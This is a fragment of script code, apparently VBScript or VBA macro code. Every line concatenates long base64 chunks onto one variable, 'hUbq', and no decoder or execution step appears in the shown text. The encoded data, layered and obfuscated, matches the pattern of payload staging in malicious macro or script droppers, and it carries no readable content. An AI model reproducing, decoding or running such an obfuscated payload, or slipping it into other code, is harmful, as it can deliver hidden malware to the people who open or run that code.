hUbq = hUbq & "LThJM0YvMEUwLklWMT1GMygrMD8yMyhQMVEsMk5DMTdNLklFM0ZOMDE5LkA6LjI3LFUvL0w0MVAsMVVVMVs2L1tQLjIuMlg7MUFPLEorL1tWMVRaLk9VMUtCLz4wLypALk5CMUpbMlJMMyxZLz03LFkrMUtKL1tMMDU4LjFEMD8uLz1JMVA/MDpJL1ZOLypFMCtbMj82M0FHMjRHLEpaMjVGMldFMDE5LjcwLz45LkBTLT5IMVVBLFU0Lz1HLFlGL0w4LkVFMERHLSpSLjFBLk9AMitBL1VWMD89MDFML0JDLEEpLEpKMT06LT5CLz4tLz0/MkhXLjVbLllGLFosMCxSLEs9MjpLMTNWMjBWMTNJLkYpL1IpLEZIMUxCLjIsMzJIMzwuMT1CM0BNLjIzMjBYLEpBMyhELklaLz1BMy1VL1tALzxaMjRNLFlLL0M0MklKLkBBLkBKL1ZWMTc3Lz1NMVBOLyoxMVstL1EzMlIvMkRJM0FYMis2L1FSMDY2Lyk7MjotLEA/MkQ9LTNOL1YpMkkoMz0tLjBaLz4wMk5KLE8/MyguL0c1LzQvLzNMMUxBMjU5LEYzLlhRMUwwMlgsM0VGMjpEMTJELlhPLzk6LEE8MiwyMVBGLz46MDBTMzxYLylHLko4MitELy9GLThNMDZBLk8zLkBPLjtVMCtOLjtXMTguMVVKLzM+"
hUbq = hUbq & "L1spLjtUMVAtLEpLLyozLE8xLTRRM0FVLC1bMEA8L00oMVpKMklBL1Y3LEs8LklYL1tGMk1HMkQ9MDBULjZKMDBVMlJLMkRNLjwyMTMoLypAMzI5LzhbL1spMitbL0cyLjY5MUtJMlJJMTJEMTJDMjBYM0BMMzc2LjBbLEo5LT5HMEU5LFRBMlg/LzgtMjlNLzkrLkUyL1svLllIMERGMDVGMy1BMjU7Lz1LLSpGMVBMLFAsMk1GL0M0Lyk1My1JMVRbLjtQMkQoMDEqMk44LjcuLEFILkA+MkRHMk46LkBCL1ZIL0MrLT4qLT1GLT5ZMTw9Lk9WLjEpL0MuMygoMy1OLEsuL1ZCLFAsLT4uLTk9LE9KLT4pLy9FLFlALkk/MzJKLTRCMiwpMTI7MDBSLkBZLFRDMzxNMEA1MEBBLlk/MEArMVE1MlJNL1pXLjs3MUcuMVRZMiwuMD9NLjEpLE8yL0w+M0IoMj80LEY0MD8yLy9CL1EoLSo6MUZDLEZCMUc8MlM3MTgsLjBXMThNL1YoLFouMkkrMT1DLylQMk1RMVVVL1ZHLEY+LjZGLkAyMlNBLFhYMEA3Mk4+MUc8LkpSLEpMLT5OMlJNLz1ILyo3M0FRMEUsLEFLMCxQMygwL1pbLjs5MjpSMzI8MVY4MlhCLz40MkhaMDorLEYzL1EpMCxCMjVLMCwxLC1H"
hUbq = hUbq & "MEAtMj8qLlRGLTopLzQsMzJDLFA8MzJSMVUtL0I+Mk1ZMj5TMkQvLkA/L0w2L00tLlNYLFlVL0w2Mk07MlI4LFAyLz1HMTgvLzhPMVswMjBMMDswMjA1LEVVM0FTMUI8MklKMUtSLE9NMkQwMjoyMVpaMkRKMzxJMk0vMjVHMyksMlg6LllELC08LlNPMCw6LSpVL1E3MDFLLkVGLC1QLy5HMUI4LkpOMzJBL0wwLy5KMy0+MVE0LjVVL0MsMykzMThDMEA2Ly5GMDY+MjpMLyk4MDBaMVVAMldOMVpKMzxCMVUtMUc5MjU3MkREMThRMUZYMy1GMDpNL1tAMkNCMDEsMj8pL0JGLyo2Ly9GMCwxMisuLEs1LEEsMk5JLT4rLEsxMD9DLTlWMEU3Ly5MMVAuMk00LFA6MDBLLzNOMUtWLS5RMUYxLEVJMzFXMERSLjBTMTNTL0dZMVEwLSs0LklbMzc4MjRMMkhSLjs3MlIrMDVSLFhaMkQoLz01My0rL1BZMj89L0c+MD89L1s0MUI7MlJZLk5FM0Y3LjIsLzRBMDo2MVEwMj5TMkRAMjArMzdFLyopMVBQMTg8M0ZNMlcuMjk/MUYxMDEtMjAzLSo+MDBOLThbMTdOLy81MiwvLEs+MkNZLjs3Mlg+L0JbLSpZMi9VLz06MThMMEU3LSpHLz1VMDBJL0dXMyhQ"
hUbq = hUbq & "Mlc+LkVXMEU7Lz0rL0xPLllAMyxTLEZJMVE4MEUuMyktM0E7M0YyM0BZMkhKL1syMEUsLy8+L00oLjwqMVE3LkVWMzZLM0BLLEE3Lk9NMD8tLEE+MjpZMklFLzQ6MjVOMjpHMUFHLlNXL0dOMTdSLlNBMVpVLyoqLk5SLy5VMUIqMUZBMUY2MVU2LTkxLTk3M0YsMVBOL0FUMVA5Lz4rMDE7MUYyMzwyLyk6MklHMzc/LFo0LT5PLT5OLjtYLTRVLS9ZMj9BLFRAMVA9MkhaLTNOMCxALjVWLThKMlcvLFo5LEVILEswMjpCMTNEMVVOMlctMDsxLkU4L1tMLk5ILSsuMVE4MD9WLFkoMykzL0cvLjs8LlQtMTxZLklJMUFJLkVQMjU0LzNDMykyMUc2Lk9TLzg5L1Y5MT1MLE9IMy4pM0VaLEoxLkErL1YtLy9BMUJHLkpRMVVFMTNVMlhCLjsxMVVVMkNPLkUxLT4xLSoxL1BZLkU6MjpVMzZXLlRGMklCLjtaL1E9M0E9MztHMy0+M0FGLlNOMjooMDFHMlM4Mj5SMj8zMVUtL0JIM0VbLjFNLzQ5L0ZUMCxPMzZWMDpTMzc+MzwpMkkqL1tNMkNBMj5IMj80LSlaLFRDMTNJMUc6M0BIM0E+MThNLT1ZMDBSLkEqLjY5LEU2LFA2Lz0pMlg1MlJDLFlFL0xJ"
hUbq = hUbq & "L0JbLE8vM0E6MVVYMVBJMjpULjFOMjAsMUFRMDpFLFU+MVVYMEU6MzguLjwqLSo1LyooMUI/MkNZL0I/My45MTdSMkNNMzI9Mzw7MVVDLjc1MkRSMjUoMjU5L1tUMERKMkM+L0tMLS5XLylRLkUyMDErLzQsMk4xL1tUMkRQLEVWLzkoMlgxLypHMUZHLSsxMjA/MldMMjVQMjA3Mis7My02L1tSLylILjIsMzI2MjVVMTdbLT43LT4vMVsvLlkuMjo6MVpGLylbLkAwMUczMzdOMVYxLC1VLFRCM0ZBLTkrMkRHMVBNLSsuLS9UMDVJLSpAMVVFLkEpM0VNMjo4L1Y2L0xJLT5JLFA6LFlNLzMrLk5RLyo6LzMsMT0pLT4yMztQLz4sMjU9L1EzLFRBLE9QLkVMLFk1MjVbMTgsMzxCL0gvMyhALTQ8MzwxMkk/MitWMERFMEArMistMVU8MUYrMVY1Mj5VLzgsLTUqLyk0LE9SMykxLlkuMEQxMjBJLE9EM0FSMygpLFk7MEA0L0w+M0E2Lyk2LzhMMj8rM0VELkBWMlhBMVAwMVBIMjA4MCw/MTdCL1EoMDsvMlIyL0I0MD9IL0dSMzJXLkRLMDpWMCxQLyo5LE5bMkNYMipWLT45Mk5BLyooLkpHMjUpMERQLC07MjA1L1FILlNEMCxMM0EtLEs3Ly87M0BI"
hUbq = hUbq & "LEpHLFA0LkVRMVs1MldBLlg6MDZDMzI6LFQ5LFotLFovLTRSLjFKMDtALjY8MzMvL1swMyhHMVE4MkkoL0c7Lk9RLjtNLz1FLk8wMitOL0xNMVEoL1tLLkUwL1ZUMldWMjBLLSo5MUZQL0xNLk5TMjAsMEA/L0wyLk9RMUFbLEs/M0ZOL0w5LzkxMDFAMTNJMlc9LEU6LFRDL1BZMDVZMkM+L0wxMzxNLTUoMjBaLjtXLEFELlQrMUc/LkEuMy4xMyhELkBPLjtAMjBULEpUMDVJLEY+MjlZLjFDMVBGLlNRMjVGMy0rLjFWLjI1Lz1VLS9EMTNUMjRbMzJKMTNILTopL1tILEY2L0ZQMDU1MzJbMisvMj5JMy4rMzJVLjs9MlNGLzdXMVVDLz1CLkpRMlM9LC03MzgoMUZGMjA1LkRZLFRRMEUtMUFZLkpaMDVZMkNQLjsuLz03Mk01LEs6MlM0LSo2MT03LT1XMkM+Lz4zL0IoLzMsMCxGL1ZELFAtMjBJL0c2Mis2MEQsLylYMj5GLy40L0M0MjpCMjA4MT1ILFA9LkpBM0FbLzktLjZBMT1DMEAwLSswLlk2Mj8qLjwqL0wtLk8yM0VaLz43MkRGMitNLT1ELEoyL1ZGLyo6MTJULEpCLk8tMk1JMitTMjVbLTk8MjYoMykxLEU9LTRZLlQpMjpUMEAzLjE3"
hUbq = hUbq & "Llk2LzhNM0BaMTw4Mz0qMy1HLy45Lzk9Ly9BMVBZMVE+LEpPMCxJMjA+MUtIMj8sL1BOMDA9MDszMj9OMDpPLkRILE9KLyo5LjZBLjtULFRRMlgvMDVJMldTLFA6MCw/Lkk/MUI+MUc0LEs7MlNDLFROMjpMMkk2LkUrL1ZRM0ZXMjRJLlg3L1ssLEY9LzhaMlIyLlk/MUw2LT5LMVpUMUc6MVBKLzhJMUFFMUI2MjUpMCwrLjFbMzJALklYMjo6Mz0tMDVIMUIxLkpRMVVOMjAzMTM0LkUrMkQ6MzdCMTg/LjVUMDA4MitYMjoqMkk2L0JWL1EsLT5aLEBOMDBQL0JYMT1BMklFLkUyLkVFLzhSMldGLzhIMVE4MTMqLkUqL0wrMz0sLypBLko1Llk9Lk80M0VLMyhOLT46M0FPLylLMlM0L00qMDU1MThDLkpJLkU+L0xaMVpCL0c/LEFBMklMMD8zMy1MMDpKMDBJMUw1MzdZMUwxM0YvLkA1MEArLkowMlg8Mj9ML1paMzxWLjtXLy43LylSLFRaL0JZL0c6LS88LEVHLThNLTRKLkorLlgzMDZJLEU8MVE0M0Y6MD9GLEA3MjpFL0tOLkpWL1YrMDsvMipWMjBQM0IoM0FWMVpTMUZZLEVWMEU5L1tKLlRCLSpAMipXMk41MlJGLjpSLS9VL00rMklCLzMv"
hUbq = hUbq & "LlNQLy5TLjs1MT1MLlg/Lk9ULk5FM0VaMkRBLTUqMDVLLypFLk9JL0guMj5ZLlNCL1E6Mk5GLEo4LkRDLFREM0BRLSspL0wwMUcxLkpNLlk9LjE6Mis2Lyo4M0FILEA7LFU1LFk1MzgvMUwsMVAxLjBYMjo4Mlc9MDE/MDBQLEoyLE81Mkk8MldBLz1VMjVYLkBNLTNLLTRbMzdNMT0rMj82MDpCL0tVMjVOLCxQLzQ9MERKMitOMy0qMDY0MkQvMyxTLFlVMjBTMVEwLzQ0MDs0LCxQMy4yMEQsLEU3MjU6MzxVLEswMUFLMCtNLzNELEs3MUY4My1ALjtbLEtCMyhLMTJGMCwwMzdRMklDMj8yLkVNLTk5MipQL0xPM0YvMldGMjpFLk5SMVEoL1E1MERbMUtRLykzLk81M0FWMjUyMlM8M0BaMlIrLjFCLTkwMVlWLEZFM0Y6LkoqMDEoLy5MLEpLMD9RL1srMzxKMjUyLTQxMUdCMDVLMDBWL0c3LS5VMTJWLThZMD9CL1FXLFA1LzNBLz1HLTRSM0VEL1FLLC06Mk1ILkpYL1YuMzZYMyg5MT1DMzI4LFAyLlQuM0Y1LEZIMEU2LFkqMjVUM0FVM0EzMldRLzgvLkpEMzdNLEE3M0EwMkhBL0dELjs/LFUrLjVUMjlaL1ZWMzgqLjpSL0dRLk5ZMUY0MDpH"
hUbq = hUbq & "MDs1LTQ7LFo0LjEsMkQ8LEFJLko0MVlPM0IoMj9QMjA7LTNPMTJILSs2My4rMEU+MzZXLS9NL0w4MlcrMThAMD9BL0xXMy0+LjY8MzJUMDYpMDsyLEsvLS9VMVU6MTxVMzI9MTNALT5FLTNUMztNMTdVMERPLzhZLEE9MzgpLkorLlg8L0xULkovMj81LypJL0IxMiwsLyk3LT5SMkNFMCxOMlg8LTlYLEVHMyk7MCs/MTdQL1Y5M0VHMlcwMiwqL0MpLz1BLy5MMD9FM0VMMi9TLEtGMUcuLyo8LlNUMUc8My4vMDpVL1FJMjlFMitALC1aL0dOMCxRMkNZLz1LMD9FLj9TLklYMzJVLEE4LlRFLTQ8LTNHMklBMjVULkEoLEpFM0BNMDY1MTxLLk5bM0BbLTRYMT1DLT4rMitQLlhPMVA9LFRaLkRJMTxLL1EtMzwrMj5SLSpaMVY5LlQ9MlJGMkRPM0ExLC1QLE9UL0xPMlJLMjBMLSlTMEAtL1pEMlIyMUdFL1FMLEVQMUc0MVVYMjBMMVE4LS80MkRGMlM3MUE6LFA3MVs0MlM+MjpTMjAtLjFbMUZTL1VVLFlFLzhZLEEtL1paLzdbLjIxMTxYL00oLjpSLzM0LTQ1Lz4wLy9FLSpDMUE4MTdaLS9GLjtCMDVFLEVHLT5DL0dPMlJTMkRILjpRLyo7Mkkr"
hUbq = hUbq & "LEVXMzFVLkA2MkQ6L0dDMTJbLS8vLzM0LFRIMk40Lz09LkAxMklCLy89LTQ2MT0tLzQ1L1spLlg9MT1DMTxZLzk4L0xTMjApMEU9LlNVLzQ+LzgvLz4oMUY3LlQ8LlksMklCLTRQMjBZMjVaLEY7MThAMDA5MzI5LkA2MEUxMEApMD8uMldTL1tCLy5CMVYsLkYoLy5KMkREL1tOL0JZMk03MVA7L1pDLE8uMzMwMEU7Lj9PMVo7Lzk9LjVWLS86Lyo/Mk1VMVs2LEZGMD8rMitGLkRNLS80MkkqL0MvM0ZTLlk9MVVML1ZELy5BLC1XMEQqL1pXLyo+My4wLC4qMjAvLyo1MUFbMCtSLzRCLjpSL0gwMj89L1BIMldSLE8tLS5QMklHMTMpLkU3MzxOMyk4Mis4MD9JMD9ALS9TLlNYMUYzLzQyMjU+LylbLjZSL1EyL1pJLkpKLklMMUwzMUJKMVo8LFAsL0c2LT5XLzk6MERGMUI1MitVL1ZHMVY6LFo4MThQM0YuLzhIL0w/LE9VLk8rMVBBLSpKLjc0Mis3L0MuLlQwLjwqLy9FMiwvLkRMMCtNLFU+LylGMkhaMDVTLkorLlRCLT1HLy4wMDA5MldDLy8uLkBXMD9EMEQ5MTxVMk1SMldGM0FNMDBbMVAoLjI5Mj5YMDA8MldPLzQ3LFQrLT5QMVEpMztS"
hUbq = hUbq & "MDVFMzJJLTkqMUZQMjpaLFlCLzNCLk9OMEREMzc+Lko3MEUyMEQqLllJLlNTMVEzLzMzLllLM0VbLklaMVpJL0tUMTdTLS8/LT4tLlQpLT1ZMzIxLS8xMUZTLzgvMlJFMENbMy1ILjFVLEVIMTxAMTdXL0dQLT5NLS8tLjsvM0YwLjs9Lzk4LTRKLEpBLjZXMi9RLjFWMCw/MD80MEU9L1YzL1suMj8zMzxSLS81LjZaMTM1Lz1OLlM/MjpPMVBFMEQoMzw4M0ZIMkNCLzg+LSsrLkVHMDBJLzNRMzI0MVU8LlhBLlk8Mz0tMyk1LjIoMk0vMEU7MERZLyk6MVBKMT03LEpQMjk/Mj9RL1YsLz1KLEtCL1ZKMVooMTw6LypBL1tLMiwxMztNMVYvLyk1LSopMU9bMkkuMjRILkA8L0JUMT0tMDZDM0YyL0I3LFREMUxCLypBM0ZWMVo1M0EpLSo+LlkuMDFJM0VNLz42MVU9MzxQMERCMyk6LzNJMTdRMkk8LlhSLzxaLSpJLSpJLylZMTxTLkVWLT5YL1pSLTRQM0VMLy9BMy05LzNFLjtAMjpJLSo1MjBTLy5UMEUxMj8xLy81MjRLLEtBLkAuMkkuLEE1MjlWMy1XMk5KMVozL1EqMkRLMVE3Lzg/Mzc0LTkoMztULzQ9Ly9FMDpGLEs5L0cyLFA4Lyo/LylV"
hUbq = hUbq & "LC0rMj5aLC1QLT43LEpZMDU4Lyo/Lj9QMTxVLFQ+MUFXLyo4LE8sLz4pLyk3M0E4LS9DL1pRLylJMjlWMDBAMVE8LS9BLToqL1YqL0MzLFRaLjFKMUw1LFktLyo7MitNLS82LEErMUdEMzI+L0JDMD8+MUw3MTJULlkrMiwqL1FVMy45LlNSLjZFMzJTMzxLLC0yMzxbLlRSM0YtLFQ7MzdBLy5QLj9TLjFBMyhALThHM0BaMkhJL1tDLzhDMkRRLFRBMzxZMERDMERSL0wtMD8/LkVTLThZLC09MykwLzk5LT5MMiwpLFk9LC0qMDFCMUc3Lz4tMEAuLy5UL0I0LFUoMEQuLklGMj5ILT5JL0dNMDpEMjo6MDBULyopMTxKLFhYMy1NLlhZMDZDLk9SLjZEL1ZYLFQvMk1LMy0sLzM/Ly5HL1tSMVVKLkUrMkRCLkpXMERbMjA8MzxKLklYMTguMlMwLzQzLz46MjlILjZRMj9UMThKMjEpL0tPMjRDMjlVLS83L1svMyhRMkNXLS89MThDLjZBMkQ5MlgtMVAxMDVUL1ZYLy5WMTMrMzdVLkA3MDVHLlNALjIzLjVaMzxSLk9MMUIqLEE2LC0vMDtFMEA6L1FPL0dDL1pTLThPLjpVLlNULjtOMzZQMjU1MDZEMk4yMDEqLEFEMlZbMyhFLkVIL0w3LFRMLlk9"
hUbq = hUbq & "MjRDMy1GMklCMERbLjVTLz44LkouLzxbMVo+M0FaMj9TLjY2MjpaMk1HMlc/LlhQMTxUMUZQMzwqLjc2L0I7LjswMVE4LEtGMklGMTJYM0Y3MjUqMjBBMVA9MzMqM0ZKMUI5MERJLE8yMk41MTg7LklHLkA2LjVYLyk7L1tIMVsvMjUvLCxbMlJRMDpJLlQtMis2Lk89MVlTLjFJMVpbMUFQLFo0LFRCLFRGL1sxMzIzLzgwLk8+MUwqLkpaMUtIM0YoMj9DLjE7LjBZMUI1Myg+LS9SLC0rMUFXLT5KLkpHLkpKLlNOMDo4Mzc3LFRQLTk7LT5TLkA1LjwyMygrMlJZMkM+MVo2Mjo0MzIxLyo7MyhHMk1ULTQyMjA0MCs7MDpXL0c6L0c3LjwwLkpDLkVSMkhTMk45LjE/MCtYLz05M0FYMUZELFo0MVsvMygwLEpIMyk3LkpKMy1FLkAqMVpWMTJCLkUwLT5YLzMwMERaLFUwMjVMLypALkEqMERMMlM/MDtELC1NMlc1LFUoMEQwLFlEMD9BMEArLTUsLk47L1FYMldNMVsyMDY8L1VKM0Y0MjlKMzcyMy1WMVpHLC1KMTc9MiszMTMyLTUoM0ZQLkEoMjouMj5RMy03Mj8qLjIpL0xLMUtUL0xRMjVVLjczMUFOMj5bLTQ9Llk3L1EoMTdWL0gqMk1YLE8+"
hUbq = hUbq & "MlcvLzgqLTNMMDpNLkBVMUFFLk5FMEU+LjFVLlRRLEo4MjU9L0xQLSo8LjE6Lz4sLk9ILy45MjovLC1WMEU5L1VDMThEM0BaMVpAMEU2MDY0Lyk0LzQ7MlhCLzg9M0FOMDYpLEYyMlcvLjVYMyhPLlRHMjU1LylIMTdBLklaLlk8LkBBMUI0MDBLMUIqLTkwMUFLLy85MlJML0wzMztULEFDLylGLkBRLjFHLzNELTRBMVAtL1ZYMCwpMD8+LSpFMVU6MDo4MzM1MVVYMVo4LjZJL0ZQLEs+LS8tLjIvMlcsLE9KMEQ5MUwwM0VXLSpSLTlbLEBTLklKLjZBMkhBLCxHMUswLj9VLlhQMTxKMEA8MlJSMjlZLTQzMUZVL0IxLlhOLkBKLFk4M0ZDM0ZBMTgyLSo7MVE5MTNJMitXMVAtL1ZZMzc8LjFALy82Lk9WLjIqLjI4MVspLEVPMjAuLSpWMDpFMjpVLjwxMEUwMjVGMkQ/LT5aMD8tL0w5L1ZKMUZRMCxNMTJHMjU1MEA8LC03Lk8yMVBHMjRHMk1IMy0rLklYLy5TMTJUMVlXLk9MMDY+MlgzLCxbMj9EL1ZGLzNUMyxZL0MxMjpDL1YxLT4qLz0tMz0pMVA9L1BJLFUzMk49MTxLMj5aLFUuMTxaL0I5LFU7LTQ+LjtFLjFIMlJNLE8zMlcsLjBYL0FU"
hUbq = hUbq & "L0xMLEVKLkouLkA5MkhNMldILklLLEFHMD8yLklEMjAuMDVYM0Y3LjtNLkA/LE8/LjEoMTgvLC0pMTMuLy41MjUwMEQ6Mk07LjcsMjBYLjctLkYqLzNNMjU3MklJL0IpMDEoLkVJMTxaLEFCLSo8LFlVMjVHMEU1LzhAMVVYLlhMMlNELFU3MipRLjtGMDU8LkBaMj8zLTNULTAwLk9RLjZVMDU3Llg9LjVbMUZCMkQ+MUY3LkU3LzhZLTQ1Lk5WMjA2LzxZLEA5M0ZZMiwyMDtDMUE1LT4yLSs0MT1NLkYoM0YwLSpTLk9JMk1JLT5ZMDBXMjlXMCw5L1Y1Lk5JLEBRLT5BMzcvLEBNMERDMyhbMjUxLSlXMjpJMUs+M0FaLklWMUtCMkg5M0FOMDpTMEU7MlczL0dBMy06LkVVMVYoMUs0MTNDLlNXMyhMLFU2MEU9LllIMDVFLz4zMy4uMThCLS83MzJCMTNUMzw/MkNWL1IqMDo5Lz4zMjpEMz0rLFk6MDsvMVlYMzdaL0M1LEZDMitNLFQqLFk8LklIMi9HMUc/MjEtMzc3MEQ5L1E7LjZXLzQ7LylJMUFPMTNCLk5GMThSMzw6LjtPLFk1L1tELkA2LEE2MDAzLj9PMlJPLjc0MkkoM0FFMT1LMistL0I0LylbMEA+L1pRMkg4MCxALEFBMjUtMVlZLkBA"
hUbq = hUbq & "M0E9MyxaMVs0LTkoL0c9M0BbL0dEMEBCLy5ZMzwwLkROMUtEMVo0Mj9JL0wvMVE2LkA/MjpQLkU1M0FXMzJVLy5BMTNGLlQ/MDVRMCxIMjpVLzNDMVpaLjFYMj8xLEs2Mjo5LlNYLjtTMUI8MVpFLSo0L1YxLTUuMDVMMTdBLlQrLjZEMERBMi9MLTkyLFA7LzQ8MUZMMDpQLS5ZMCtOMUw8LEVPLC1WLEBZLFRKL0MoLEstLSpCMD8+MTNALE9AMDU0MUZBMjlHMCxOLC1WLFRPLFUoMDBYL1VbLFlGMDFKLjFLLFRQL1tELjFGMCwxLkAuMDYpL0c+MkkuMzZZMk1QMzM0MTdOMjo6MlIyLzNEMVpYL0wpMzwwLC08L1VYMUFZLEY6My4vLjwqLFhYLFQ/MklILjFHMkkuLzNSMy1ZMzMsM0VWLzk7LjFYL0dDMTc8Ly5ELTkyLC01MVBFMlJOLyk2Mlg0MDU7MlJBMVBDLjtQLEBTL1ZDLkEtL0xTLjtNLzMzMjBaLzQ1Mz0rLllMLjcxLlg8MjU8Mk45LS8uLSpDMVpaL1tMLko5L1BaMTNPL1YuMjAzLEBWLyk9Mis8LEZJM0ZJMThRLTAwL0xKMDY0LFk2MUdALTQ1L00sMk03LzhCMy04LzMsMis9L0M1LSspMT1JLz4pLzxZMVE9MjVNM0YuMjlNLS8w"
hUbq = hUbq & "MzM1MVAxLlRILk5XLllNMDVFMldMLkEsMyk3My43MldNLThZMj9LLEVFLSssLTQzL1FLMjk/LFU2LkUrMUcwMVBEMVBDMkRAMVo1MlhCLjE6MTdFLzksMkksL1pbMzdRLEU2MjpPMVA6MUtHM0FXL0I2MDFBLkotLFRbMDE9MDBMMVE5LFk3LypFMVEoLE9UL0w2MjVULklVMDBML1Y0LFApMTdVMlc0M0FYLklZMlcsMUYzMlcwMVVYMy0/LjE5L0JEMzI9MzdALEU1MEQwLTRJLko1Lyk0Mz0pMjlXMVpSMDs0Llg/Ly9ELFA8MVEuMyhKMzJXMDA5MjRbLSo8Lzk8Lk8yMltbLk8/L0w2MjlaMkNNLEZBMD8+MUIoLjVULC1NL0c1MldHMTJALzM+LFA4Mj8oLFUzLkVYMUI8LS83Myk5MldNMzc1Mk04MzxKMy1YMVpBL1YrLy5HMVo+MT0oLlkpLS5QMD9ALS8uMVEyLjtTMTc/LklFM0VGL0w8Ly8zMCtVLE9TMVVYMTxPLjs3MzxPLz40LEsuMzxaL0JHLTlSMDY9Lz4tLjwvLlktL0dGMjAsLkVWLlQpMVVZLS9RMUE2LkooMitbLTRUMk01L1BKL0ZPLFArL0w6M0ZQL0tPL0MyLFouMVsoMUE8Lj9ULTQ1LFRHMj5RLk5SLkEtMDU1LzNTMERSMitO"
hUbq = hUbq & "LSpBMkhJMkRALlQsLEsuLkAqLCxNMis6MVRZLE9HMlhBMjVFMD9KMykyMT1EMitVMDsvLSpGLEBTMlJKLTQ5L1ZVLjYzLzk9Ly9BLjBZLjctLCxaMykwLjtaMTw/MTJAMVBQMCwqLkpJLEpULT46MD8rMVAtMUtCMDEtMTJFLEo1Lzk9MT0uLklaLklVMUE2LjI1MT0pMj82MlhAMzdDL1ErLlk8Lz1BLTQqLk5aMjpELEVQMk5FMjU2MDU8MVo1MCtVL1FLLlNaMlg9MldLLzNLLlM8L1tKMUtVMCs9MVEwLzktLFRbMlgrMjU3L0ZSLEBKLjcvMkQoMzMqMldCLzg8Mzc1LFRHMykvLEY1L1E4MCtaMkNRLkUxMzdVMzgpL1FRL0dWLT1VMzdSMis5L1VbLS8yMkk5MjVXLklFM0VVLk5WLSlWMEU4Lk9UMzxWMUY0LjIqMVVEMkk3LFRQL00oLjZRLFA6LEBJLThNLk8uLy5HLEEoLFA/Mk5FLTNQMVE7L1pAMCxRMTJaM0BRMThSLlg4MUZTLFk2LSpFMjlVMklJLT1GM0ZRLylHLjZZMztNLjZXMVlbLjBZMj8/LjtXMyktLlRHMzwuLCxRLllCL0goLkA8MVBbMUY1MjEuLkovMjoyLEFDMEA/LlhWLEVOMkM9MTdTLEVKLEVRMDYqMEAuMDs1MzxCLyk1"
hUbq = hUbq & "LzkpLFQsMD9AMi9UMzdPLFoqMDVFLC0+MkhRL1ZZMjA8MTdTMTNIMCtPLklKLjZVMCw/LzxZMCxQMjpXLjpQMy0+L1tBLkU9MzdUMUFNMkRFMDZHMVAtL1VNMDpaMitPMlNALFo6MTguMy1bLzMuL1s/L0tPLEs3L0JJLC1FLFUzMDVMLEpJLylNLzhNLjZFLlRIMiszMjVSMVE5Ly4xLzQxLE80MDo0Mi9ML1YzLlQyMT0/M0VXMzMvLEY5LkUoLjZHLylKL0JKMjpTL1YxMDY7LkYpLkVMMjpJMj5AMzwvM0VILk5TLSsvLjIxMEA2Ly88LToqMERSLE9DMldPLzkpLFRILSooLyooLTRRLT1XL1paMk1bL1VNLy8zLlRSLFRBLEZJLEVHLFotLkRILFlNMTJBMVY1LS9GMDVQL1pSMjopMjRRLTRBMzw6MUFGMlM7Myg6MVswLz4uLz4sMDYpMjBVL0dQLjI0LTlOLjFGLjZSL1VLLjZRMVBDMDAzMlI5LkEqMk1WLk5RLlkqLjs1Lyo+Ly5QM0ZGM0Y4LEs0LTNNMTxVMygsLTUoLjtTLypKMTxOLlRSL1srLTlXL1Y5MlJCM0VVMldKLjs9LEFELkU+MitSMkNOL1YyLlQrM0E8MDY+My1WLzhMM0YuMjlVMTg8L0I3MzI4MlJRLkRKMipULkpZLFlOMyky"
hUbq = hUbq & "M0FbLy89LkRDLEVYLTRJLzkpL0gpMzxMMD9CMkkuL1E9Lk5WLzQ7Mj5TMD8zMVsxMDA/MjpaMjo5LkpLL0I+MyhSLyk1MjlVLkpJLjVYMjlNLFouLFApMTxVMDVGM0ZBLjZDMyxYLk5FMD8wLEYyMDA+MygpMVEpMD9VLCxaL1EzMkRRL0tRMy46M0YtMis0Mzw6LkUyMzxJMDEuMTM+MlIxMlc1MUw6MVsxMDs8Lz4tMEA6LkBPLkU8LS5XMkhULjE7LEs8MygxMiwoMklDLjFCLllGMVBZLS5QMTM2LE9IL1BQMDE/LjZSMVBAMzxSLTApLkpTMT1DLzk2MDA3LjtOM0Y0MitTMkhbMjAqMkRPMDU7MDE7LkRbMUcuLFU3LS8xMVU/LkpMLFRGMThFLjFYLkYpLkUwLFA6LjpWL1pVLkA9LTlHMUJDLEBALk5BMjpBMzZTMCwvLjtaMUtBLThLMTxSLT5WMj5WLjs5M0Y3LllEMEA9Lk9CLT42MkRGMDBOLk8uMEROMkNbMkRBMD9IMDBJMipSMkg5MUY4L0JZLTRbLjpQMEQsL0tNMVBCL0FYMzxLLFQ9LzQ7LTAsLzk8LT5SL0I8LCxPMUE1LTQ+MTguMy4zLzQ4MEBBL1Y3LkU7MitXMlNCMVpKMyhKMldHMVlXMEA/MVUrLzhbMlg8L0JYLzQ1LEBXLT1Z"
hUbq = hUbq & "MTJHMlMyLEpPL1E3LT5IMjlZMEA2MTJUMlM6LkRaMTJALTk7LC05MTdPLE9QMEQrLC07MDVXMT1NLzNHMjlLMzJSLylaLylSLlhUMipQMUw4Mk00LT43Mj5DM0E2MUJGLT4qL1pXL0gvMyg/Mis7MEQ5LTlSLEFMMy0rMUE2MzI5LzguLlhWLFRCLkAuMkNALjsuMlcwMlM8LkRRMTg6L00qMCxCMTxJL1E6LFouLkpRLEYzMDoxLjcvL1BQL1FbL1EpMyk5M0ZZMjBSMTgpMklHMldUMjovMjo0MldRMzxCL1IpLkRIMTMuMlg0LFA3L0gxMzgqMyhQMUFGLFAqMzxXMlJDMlgwMTI7MVlVM0ZDMzcxMk09MCxGMDVaMy1ELEVPLkpRMzxQMjVXL1pFMDpBMVVALkErLlRRLzxZMk5JMlc+MkRLMUJJLFU8MDBALSpKMjlWMDZAMzxXLS5QLk89L0c0MkQuLjVVMDBQL1pHMDFCMEREMkhaMEBAMzwvLFAsMjBYL1tKMi9TMy1VMT1BM0YpLjsvLEU7LzQvMVBOMjA+LFo6LTRNLk9JMTgqMVE4My1JMTNNLkBBMkNFLlNSLFQrLEU3L1pELkA4LTk+LSswMUctMDVHL0gtMTNCLTlOLC05L1Y5Ly87Lk9JMDFLM0ZBLC06LFQtMERRMzIpMThLMTxVMDA+Lz1F"
